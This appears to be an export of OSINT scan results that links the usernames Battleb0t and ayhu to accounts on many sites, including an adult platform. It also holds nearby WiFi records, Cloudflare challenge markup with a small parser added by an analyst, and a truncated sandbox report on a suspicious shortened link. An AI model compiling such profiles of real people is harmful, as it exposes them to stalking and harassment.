| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Ten Forward 5 (Net ID: 00:01:9F:34:7C:14) | 34.0544, -118.244 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Curiouscat (Category: social); https://curiouscat.live/Altpapier | Altpapier |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | themeforest (Category: art); https://themeforest.net/user/login | login |
| 2023-05-12 02:54:13 | Linked URL - External | No | Web Spider | 1 | 0 | 2 | 0 | None | https://github.com/BattleB0t | https://battleb0t.xyz/ |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | TEO Network Enterprise (Net ID: 00:01:24:F0:B7:E1) | 37.780462,-122.390564 |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | MCUUID (Minecraft) (Category: gaming); https://mcuuid.net/?q=Battleb0t | Battleb0t |
| 2023-05-12 02:54:21 | Web Content | No | Web Spider | 0 | 0 | 5 | 0 | None | .container{width:100%}.bg-white{--bg-opacity:1;background-color:#fff;background-color:rgba(255,255,255,var(--bg-opacity))}.bg-center{background-position:50%}.bg-no-repeat{background-repeat:no-repeat}.border-gray-300{--border-opacity:1;border-color:#ebebeb;border-color:rgba(235,235,235,var(--border-opacity))}.rounded{border-radius:.25rem}.border-solid{border-style:solid}.border-0{border-width:0}.border{border-width:1px}.border-t{border-top-width:1px}.cursor-pointer{cursor:pointer}.block{display:block}.inline-block{display:inline-block}.table{display:table}.hidden{display:none}.float-left{float:left}.clearfix:after{content:"";display:table;clear:both}.font-mono{font-family:monaco,courier,monospace}.font-light{font-weight:300}.font-normal{font-weight:400}.font-semibold{font-weight:600}.h-12{height:3rem}.h-20{height:5rem}.text-13{font-size:13px}.text-15{font-size:15px}.text-60{font-size:60px}.text-2xl{font-size:1.5rem}.text-3xl{font-size:1.875rem}.leading-tight{line-height:1.25}.leading-normal{line-height:1.5}.leading-relaxed{line-height:1.625}.leading-1\.3{line-height:1.3}.my-8{margin-top:2rem;margin-bottom:2rem}.mx-auto{margin-left:auto;margin-right:auto}.mr-2{margin-right:.5rem}.mb-2{margin-bottom:.5rem}.mt-3{margin-top:.75rem}.mb-4{margin-bottom:1rem}.ml-4{margin-left:1rem}.mt-6{margin-top:1.5rem}.mb-6{margin-bottom:1.5rem}.mb-8{margin-bottom:2rem}.mb-10{margin-bottom:2.5rem}.ml-10{margin-left:2.5rem}.mb-15{margin-bottom:3.75rem}.-ml-6{margin-left:-1.5rem}.overflow-hidden{overflow:hidden}.p-0{padding:0}.py-2{padding-top:.5rem;padding-bottom:.5rem}.px-4{padding-left:1rem;padding-right:1rem}.py-8{padding-top:2rem;padding-bottom:2rem}.py-10{padding-top:2.5rem;padding-bottom:2.5rem}.py-15{padding-top:3.75rem;padding-bottom:3.75rem}.pr-6{padding-right:1.5rem}.pt-10{padding-top:2.5rem}.absolute{position:absolute}.relative{position:relative}.left-1\/2{left:50%}.-bottom-4{bottom:-1rem}.resize{res
ize:both}.text-center{text-align:center}.text-black-dark{--text-opacity:1;color:#404040;color:rgba(64,64,64,var(--text-opacity))}.text-gray-600{--text-opacity:1;color:#999;color:rgba(153,153,153,var(--text-opacity))}.text-red-error{--text-opacity:1;color:#bd2426;color:rgba(189,36,38,var(--text-opacity))}.text-green-success{--text-opacity:1;color:#9bca3e;color:rgba(155,202,62,var(--text-opacity))}.antialiased{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.truncate{overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.w-12{width:3rem}.w-240{width:60rem}.w-1\/2{width:50%}.w-1\/3{width:33.333333%}.w-full{width:100%}.transition{-webkit-transition-property:background-color,border-color,color,fill,stroke,opacity,box-shadow,-webkit-transform;transition-property:background-color,border-color,color,fill,stroke,opacity,box-shadow,-webkit-transform;transition-property:background-color,border-color,color,fill,stroke,opacity,box-shadow,transform;transition-property:background-color,border-color,color,fill,stroke,opacity,box-shadow,transform,-webkit-transform}body,html{--text-opacity:1;color:#404040;color:rgba(64,64,64,var(--text-opacity));-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;font-size:16px}*,body,html{margin:0;padding:0}*{box-sizing:border-box}a{--text-opacity:1;color:#2f7bbf;color:rgba(47,123,191,var(--text-opacity));text-decoration:none;-webkit-transition-property:all;transition-property:all;-webkit-transition-duration:.15s;transition-duration:.15s;-webkit-transition-timing-function:cubic-bezier(0,0,.2,1);transition-timing-function:cubic-bezier(0,0,.2,1)}a:hover{--text-opacity:1;color:#f68b1f;color:rgba(246,139,31,var(--text-opacity))}img{display:block;width:100%;height:auto}#what-happened-section 
p{font-size:15px;line-height:1.5}strong{font-weight:600}.bg-gradient-gray{background-image:-webkit-linear-gradient(top,#dedede,#ebebeb 3%,#ebebeb 97%,#dedede)}.cf-error-source:after{position:absolute;--bg-opacity:1;background-color:#fff;background-color:rgba(255,255,255,var(--bg-opacity));width:2.5rem;height:2.5rem;--transform-translate-x:0;--transform-translate-y:0;--transform-rotate:0;--transform-skew-x:0;--transform-skew-y:0;--transform-scale-x:1;--transform-scale-y:1;-webkit-transform:translateX(var(--transform-translate-x)) translateY(var(--transform-translate-y)) rotate(var(--transform-rotate)) skewX(var(--transform-skew-x)) skewY(var(--transform-skew-y)) scaleX(var(--transform-scale-x)) scaleY(var(--transform-scale-y));-ms-transform:translateX(var(--transform-translate-x)) translateY(var(--transform-translate-y)) rotate(var(--transform-rotate)) skewX(var(--transform-skew-x)) skewY(var(--transform-skew-y)) scaleX(var(--transform-scale-x)) scaleY(var(--transform-scale-y));transform:translateX(var(--transform-translate-x)) translateY(var(--transform-translate-y)) rotate(var(--transform-rotate)) skewX(var(--transform-skew-x)) skewY(var(--transform-skew-y)) scaleX(var(--transform-scale-x)) scaleY(var(--transform-scale-y));--transform-rotate:45deg;content:"";bottom:-1.75rem;left:50%;margin-left:-1.25rem;box-shadow:0 0 4px 4px #dedede}@media screen and (max-width:720px){.cf-error-source:after{display:none}}.cf-icon-browser{background-image:url(/cdn-cgi/images/cf-icon-browser.png)}.cf-icon-cloud{background-image:url(/cdn-cgi/images/cf-icon-cloud.png)}.cf-icon-server{background-image:url(/cdn-cgi/images/cf-icon-server.png)}.cf-icon-ok{background-image:url(/cdn-cgi/images/cf-icon-ok.png)}.cf-icon-error{background-image:url(/cdn-cgi/images/cf-icon-error.png)}#cf-wrapper .feedback-hidden{display:none}#cf-wrapper .feedback-success{min-height:33px;line-height:33px}#cf-wrapper 
.cf-button{color:#0051c3;font-size:13px;border-color:#0045a6;-webkit-transition-timing-function:ease;transition-timing-function:ease;-webkit-transition-duration:.2s;transition-duration:.2s;-webkit-transition-property:background-color,border-color,color;transition-property:background-color,border-color,color}#cf-wrapper .cf-button:hover{color:#fff;background-color:#003681}.cf-error-footer .hidden{display:none}.cf-error-footer .cf-footer-ip-reveal-btn{-webkit-appearance:button;-moz-appearance:button;appearance:button;text-decoration:none;background:none;color:inherit;border:none;padding:0;font:inherit;cursor:pointer;color:#0051c3;-webkit-transition:color .15s ease;transition:color .15s ease}.cf-error-footer .cf-footer-ip-reveal-btn:hover{color:#ee730a}.code-label{background-color:#d9d9d9;color:#313131;font-weight:500;border-radius:1.25rem;font-size:.75rem;line-height:4.5rem;padding:.25rem .5rem;height:4.5rem;white-space:nowrap;vertical-align:middle}@media (max-width:639px){.sm\:block{display:block}.sm\:hidden{display:none}.sm\:mb-1{margin-bottom:.25rem}.sm\:mb-2{margin-bottom:.5rem}.sm\:py-4{padding-top:1rem;padding-bottom:1rem}.sm\:px-8{padding-left:2rem;padding-right:2rem}.sm\:text-left{text-align:left}}@media (max-width:720px){.md\:border-gray-400{--border-opacity:1;border-color:#dedede;border-color:rgba(222,222,222,var(--border-opacity))}.md\:border-solid{border-style:solid}.md\:border-0{border-width:0}.md\:border-b{border-bottom-width:1px}.md\:block{display:block}.md\:inline-block{display:inline-block}.md\:hidden{display:none}.md\:float-none{float:none}.md\:text-3xl{font-size:1.875rem}.md\:m-0{margin:0}.md\:mt-0{margin-top:0}.md\:mb-2{margin-bottom:.5rem}.md\:p-0{padding:0}.md\:py-8{padding-top:2rem;padding-bottom:2rem}.md\:px-8{padding-left:2rem;padding-right:2rem}.md\:pr-0{padding-right:0}.md\:pb-10{padding-bottom:2.5rem}.md\:top-0{top:0}.md\:right-0{right:0}.md\:left-auto{left:auto}.md\:text-left{text-align:left}.md\:w-full{width:100%}}@media 
(max-width:1023px){.lg\:text-sm{font-size:.875rem}.lg\:text-2xl{font-size:1.5rem}.lg\:text-4xl{font-size:2.25rem}.lg\:leading-relaxed{line-height:1.625}.lg\:px-8{padding-left:2rem;padding-right:2rem}.lg\:pt-6{padding-top:1.5rem}.lg\:w-full{width:100%}}
| http://vscode.battleb0t.xyz/cdn-cgi/styles/main.css |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | My Passport (2.4 GHz) - 07E0F4 (Net ID: 00:00:C0:07:E0:F4) | 52.3759, 4.8975 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Discogs (Category: music); https://www.discogs.com/user/login | login |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet (Net ID: 00:01:36:2D:B3:F8) | 34.0544, -118.244 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | fansly (Category: XXXPORNXXX); https://fansly.com/ayhu/posts | ayhu |
| 2023-05-12 03:23:17 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.4:80 | 188.114.96.0/24 |
| 2023-05-12 03:43:57 | URL (Form) | No | Page Information | 0 | 0 | 3 | 0 | None | http://ayhu.xyz/ | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c5e7988238a')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="y6.jA_9kQFy3M6YOg.QQj0I7RDwRq_S0_mJGsO_2b80-1683861862-0-AcgqVWkb5rc1wRzq8CruZzqixRf2dFZvnnpeMqPo3y2RR7Jx_-WXovg8bbE5-sP--_UlGfcV7z4_V2dzBcMQgc0YMGe-kEUsKgbTagVXmpUA4ghc-4PKKMUpkHtuZz1pOKMcK0utLj3hccZMUZnWLxuhkTuTIuQG4o4TSyLTO5DkVUoXElS5eAJBZDveAXcM-BMmbtyiS5OZrdIj-mSAmfLaL706pmvV2Fnl5vtOScBdKynAsN6R2sxLPULzhy1STjWMiZSraZ6Ew2wxtjJHN1h4TKQbcQWPXgeC7N8JO4M701hR33k8KGtSEURoh0GVidfXau0xJ5Jr_OGYkw5FwTBNxUlh_dNr8sS8DOR88UaR5CKeXC5a8lA8uHqsSe_vEPdtQ6ldEQsz8iyhLDK-toyNqpISWEaAU-LNzhQYcTSFycIkBAwjz1zpN5j-awjwVXg6RSi8xKpcwkSr--vTKuOd6x5Ta6zVKvVa1ZDb1BUG5hCEGVVAylLih2TiGym6K9ZGtKfmo5uFC383bpOhjywcXyRzMeHVb0-6rTS3z63iX3ajtvlcxXXHBtT7ZYhauWYn6f0gWo9iG78z0gFNWMboZLU8duYgFtCeIooI5W88WdaOwHui00SnK7AZf-I1NO1RlI5CzrcfcBEcVnBP-f_yBVIgGca2GM5pwr7RuguWROnl62QKlF8-RLW3LA5gZmJXKAJZeG1tfcH7m64xxmCx5ACGWrjrUMscOUmz4eHVBUSovlHfs3fcaIk9rIcxhwwBJRVDZ7oKn49L5lwNMgQFGDH_uzu8lK7M31bKNSdUqZK_4nMd7x2dSJvuX6x1f0d5_OcVPHJZxZ3t19Y2v21qYtJUwk_l3orppRJLdYFyIFSiVGRp27InLA-bNsaoFJuYkaXhMvKIRYQcI57Gu9t5UJBJyHfItWPN13CPHmTRR-xesXCsUCGNSlrn27LW82G3vB0LsnqsDVH9D7CmoXk767loN6MRiMM6E9lV7pktIJEgRREZerErCz-Gw9056q07NCPJYQafcy44fhA0Ayu8GVn0zQYz2hW6ho8NtCxWLxQfDeVyMn6PMsg4IcHVBtGEwWH4OhHGTM9Y96fCik0WwBZwbXdS00HiRtlSReGbhDYPFuGYXFHlUkiHUQ8TNNjJwXP8HrnSnr-Tv6HMk8DT21iZM1t8Ws-Z1VPVHIUqMpqoj6bYoJTKdTHCyWVXSoymcDjiiAr_dGcQ70iCvCfjEHAw9_ZFb11mKAVckSFfHs_OhqOxwVZ8fWFWX5CRVYjb8-2Mg4cL3IvIHLOVh97Eo-8uZhAyESkAuV2iGT1_77CGqcRlglDGfKHj9D0j_GrA2lys8V_W4n84xH9sB9BtW8YrWDnEH4r1lV4ZaxbUDArRwxqP9P1FzSMMjtcVzsgzIRpF2ste2ogtL1ku1f750t7TYDkzGvNZnmSp--sTxTZcyZjvZuT-kxIOnFkQudjV92D0dpRia33x6FdgV44_rvGqDtNVBEvpDVRPc5F7iWJTGkpG_0wSt-t0pHAlpnVj5960VNsQ1fIVqzIjyeTRIupoKny56OID3zofBUX9GXMMvftzuBxkvH568kA-nhoghfb5gJUTU4dQVs3R3lvIMsLJW_0OugCzVwa7bbjSi3yNlNTmyyZSUaQHqMOYwEHt04GQZ_JQBpDCQvIGLq1fOLeArqr97ZPrGgk_x7n2c6MIQK0vFFlSI1sI8OS4yi8D0V-GNr2Bt_G2Ue_TKIZGNfQPaWAM0jGlpc1nPWIZS-sYxW-8ui-6eexGBFZ5-zLr2uaHNG_xNol2Di7iRI4TW5JoZOZTUx2wSZVCmafA5viAw12czMeK4Ymm36GiAo0mTnIrrghObXpHRydCjEOD-ie6KdVTajZGWvZP24dk25nzr
x7uELmxfIPaAvIALx9AdiYBCbeQ0Yz_UH9uDQF6Eh_AqthmXwQQH1F4IA_32McFzcxir6Txr6Mur3t22mOZF963IcNMqvP7vPcccq_rufb25sF8o6nhmaVg8cgPEKIwNeq8Yai0pVnLlllLMVSWIHePNfLuLOdg9LDG1pq1rafu4Rgb-yc2Aoh4enGvHZkuRe6wlOLCDdREAADDoXkFVowEW_DGLxK1pMON0uU78NiTV9_r2o4osZBaOPn8heMmK90xPpnLokgH3gubppwq1gfmaT0RIIPWt7RVKpJRXQ_wSjLVjILALRXQY6PbelUym6TQ1z5fJfHRmrHxVnQvY6aogsFcFGtQVSrl8OCNEwv9P3oaH1GWxoSabHdrSKZmlLs2m-l9LJf4El9FKIA3NBr09u94xMLRSPmEHb4Ol-KPCw5RJiAwyBy2nrohjehlLLjGIgbGh_hTPi8G-yGwVEOyQB8GJBts_O8-g8mz65tw5NpdS_SbFPOasS6txd-b_DzeOnkkcJgqOwM_x3VH39HvzlVBkxqyTu-7yh1ffXA3EAxe-TkXe6foRnX1wH3iJh2_MCDDGxTOkk8Xj59t6wAawmHCKnU2CvogDUE">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '13063',
cRay: '7c5f8c5e7988238a',
cHash: 'ba708169066f393',
cUPMDTk: "\/?__cf_chl_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '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',
t: 'MTY4Mzg2MTg2Mi4xNjAwMDA=',
m: 'c3pqWAYwgRkhuI1rZgTpwNhg2e/0sRGYZUtHGzVigsI=',
i1: 'NNf66iKUbSi3dpVZsq8TXQ==',
i2: 'dYlWHTj6TB0dDvgfdZy2xA==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c5e7988238a');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c5e7988238a';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
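
Analyst note on the "URL (Form)" row above: the body is not a form on ayhu.xyz but Cloudflare's managed-challenge interstitial (title "Just a moment...", loader under /cdn-cgi/challenge-platform/, hidden `md` token), so it says nothing about the origin site; the same applies to the `cf-error-source` / `/cdn-cgi/images/cf-icon-*.png` stylesheet recorded for vscode.battleb0t.xyz, which is Cloudflare's error-page CSS. The `cRq` object inside `_cf_chl_opt` records the request that tripped the challenge, base64-encoded. The parser below is an added example written for this page, not SpiderFoot or Cloudflare code; its input is a constructed, trimmed copy of the challenge page above (the fields it does not decode are left out), and decoding shows the challenged request was the scanner's own: GET https://ayhu.xyz/ with a Firefox 62 user agent at 2023-05-12 03:24:22 UTC.

```python
import base64
import re
from datetime import datetime, timezone

# Constructed sample: the title, loader path and the `_cf_chl_opt` object copied
# from the challenge page recorded for http://ayhu.xyz/ above, trimmed to the
# fields this example reads.
SAMPLE_HTML = """<title>Just a moment...</title>
<script>
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cRay: '7c5f8c5e7988238a',
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
t: 'MTY4Mzg2MTg2Mi4xNjAwMDA=',
}
};
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c5e7988238a';
</script>"""

# All three must be present before a body is treated as the edge's interstitial.
CHALLENGE_MARKERS = ("Just a moment...", "/cdn-cgi/challenge-platform/", "_cf_chl_opt")
# key: 'value' or key: "value" pairs inside the JS object literal
FIELD_RE = re.compile(r"\b(\w+):\s*(['\"])(.*?)\2", re.S)
# base64 fields of cRq and the names this example gives them
B64_FIELDS = {"ru": "url", "ra": "user_agent", "rm": "method", "t": "timestamp"}


def is_cloudflare_challenge(html):
    """True when the fetched body is Cloudflare's challenge page, not origin content."""
    return all(m in html for m in CHALLENGE_MARKERS)


def parse_challenge(html):
    """Return zone/type/ray plus the decoded request that triggered the challenge,
    or None when the body is not a challenge page."""
    if not is_cloudflare_challenge(html):
        return None
    m = re.search(r"window\._cf_chl_opt\s*=\s*\{(.*?)\n\};", html, re.S)
    if not m:
        return None
    fields = {k: v for k, _, v in FIELD_RE.findall(m.group(1))}
    out = {"zone": fields.get("cZone"), "type": fields.get("cType"), "ray": fields.get("cRay")}
    for key, name in B64_FIELDS.items():
        if key in fields:
            out[name] = base64.b64decode(fields[key]).decode("utf-8", "replace")
    if "timestamp" in out:
        # t is a Unix time with microseconds; it also appears in the __cf_chl_tk token
        ts = float(out["timestamp"])
        out["issued_utc"] = datetime.fromtimestamp(ts, tz=timezone.utc).isoformat()
    return out


if __name__ == "__main__":
    for k, v in parse_challenge(SAMPLE_HTML).items():
        print("%-11s %s" % (k, v))
```

In a spider pipeline, run is_cloudflare_challenge on every fetched body before recording forms, links or "Web Content"; a challenge hit should be stored as a bot-management finding for the zone (with the ray id for correlation), not as content of the target.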
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | a-zoom (Net ID: 00:01:38:D4:87:A3) | 37.780462,-122.390564 |
| 2023-05-12 02:57:26 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://rebrand.ly/zkdr5qh', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [u'18.232.255.120', u'35.229.48.116', u'52.20.78.240'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://rebrand.ly/zkdr5qh#cbk%40cbk.gov.kw', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"18.232.255.120:443"\n "8.249.23.254:80"\n "192.124.249.23:80"\n "35.229.48.116:443"\n "104.17.24.14:443"\n "52.20.78.240:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ocsp.godaddy.com"\n "ocsp.sectigo.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': 
u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ef4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_ef4_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_ef4_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3828"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_ef4_IESQMMUTEX_0_331"\n "IsoScope_ef4_ConnHashTable<3828>_HashTable_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_ef4_IE_EarlyTabStart_0xc2c_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27]- [targetUID: 00000000-00003252]\n "07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D" has type "data"- Location: 
[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D]- [targetUID: 00000000-00003252]\n "51C778D1B3D7448EC0DA4AE3D4980DFC_A397D18A0CD6D90D198AF5B25C97EE7F" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\51C778D1B3D7448EC0DA4AE3D4980DFC_A397D18A0CD6D90D198AF5B25C97EE7F]- [targetUID: 00000000-00003252]\n "EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D]- [targetUID: 00000000-00003252]\n "CA7EF15DA1A3F288F2EC1D2ED9F27BE3" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CA7EF15DA1A3F288F2EC1D2ED9F27BE3]- [targetUID: 00000000-00003252]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003828]\n "KWL532KX.htm" has type "HTML document ASCII text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\KWL532KX.htm]- [targetUID: 00000000-00003252]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00003252]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003252]\n "~DFEB7596C6C011B031.TMP" has type "data"- Location: [%TEMP%\\~DFEB7596C6C011B031.TMP]- [targetUID: 00000000-00003828]\n 
"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003252]\n "2WBPSNI5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2WBPSNI5.txt]- [targetUID: 00000000-00003828]\n "WZONAU8G.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\WZONAU8G.txt]- [targetUID: 00000000-00003252]\n "B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E]- [targetUID: 00000000-00003252]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', 